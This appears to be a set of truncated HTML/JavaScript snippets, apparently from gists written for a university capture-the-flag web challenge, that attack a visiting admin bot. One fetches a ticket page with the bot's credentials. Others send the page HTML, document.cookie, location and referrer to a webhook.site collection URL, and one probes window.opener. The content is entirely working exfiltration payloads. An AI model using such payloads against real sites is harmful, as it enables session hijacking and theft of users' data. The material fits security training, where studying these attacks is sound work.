This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <body> | |
| <script> | |
| // The bot came from the ticket page - let's fetch that page | |
| var ticketUrl = 'http://challenges.iik3100-h25.iaas.iik.ntnu.no/ticketchecker'; | |
| fetch(ticketUrl, { | |
| credentials: 'include' | |
| }) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <body> | |
| <script> | |
| // Send the entire page HTML back | |
| fetch('https://webhook.site/8de9aa50-bb9f-49d4-9f0d-810e6f23de5d', { | |
| method: 'POST', | |
| body: 'html=' + encodeURIComponent(document.documentElement.outerHTML) | |
| }); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <head><title>Report</title></head> | |
| <body> | |
| <script> | |
| // Send all available data | |
| var data = { | |
| cookie: document.cookie, | |
| location: window.location.href, | |
| referrer: document.referrer, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <head><title>Ticket</title></head> | |
| <body> | |
| <script> | |
| // Try current document cookie | |
| fetch('https://webhook.site/8de9aa50-bb9f-49d4-9f0d-810e6f23de5d?cookie=' + document.cookie); | |
| // Try to access opener window | |
| if(window.opener) { |